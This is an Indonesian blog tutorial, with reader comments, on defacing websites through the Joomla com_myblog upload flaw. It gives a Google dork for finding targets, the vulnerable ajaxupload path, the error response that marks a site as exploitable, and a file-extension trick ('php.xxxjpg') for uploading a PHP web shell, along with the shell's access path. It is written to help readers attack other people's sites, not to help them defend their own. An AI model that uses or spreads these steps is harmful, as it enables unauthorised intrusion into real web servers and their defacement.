Deface dengan Joomla Com_Myblog Exploit

Yoo Cherry September 10, 2015 Tutorial Deface 3 Comments

Oke kali ini saya mau share tutorial deface dengan Exploit com_myblog pada CMS Joomla. Exploitnya cukup mudah sehingga bisa langsung dipraktekkan.
Langsung saja
Google dork : inurl:/components/com_myblog/
Exploiter : download
Exploit : /index.php?option=com_myblog&task=ajaxupload

Jika kalian mendapat error

{error: ‘No file has been uploaded.’, msg: ” }

Tanda nya situsnya vuln.

Langsung eksekusi saja dengan exploiternya. Jalankan dengan xampp jika kalian menggunakan windows atau langsung buka di terminal jika di linux.
Untuk shell , supaya sukses upload dengan ekstensi php.xxxjpg / html.xxxjpg
Jika sukses maka akan ada notice seperti di screenshoot :

Shell akses :
localhost/images/shell.php.xxxjpg

Untuk yang kurang jelas bia lihat videonya disini :

Sekian tutor kali ini semoga bermanfaat.

About The Author

Yoo Cherry

sysadmin / blogger / geek / ubuntu user

Tags:Deface, Exploit, Hacking

3 Comments

olic edogawa October 2, 2015 Reply
PHP Fatal error: Call to undefined function curl_init() in /root/wew/exp.php on
line 3 ane gitu napa yah ?
- chiaki October 3, 2015 Reply
  install phpcurl
Yuki-chan November 12, 2017 Reply
Web based ada gak?

Related Posts

About The Author

Yoo Cherry

3 Comments

Leave a Reply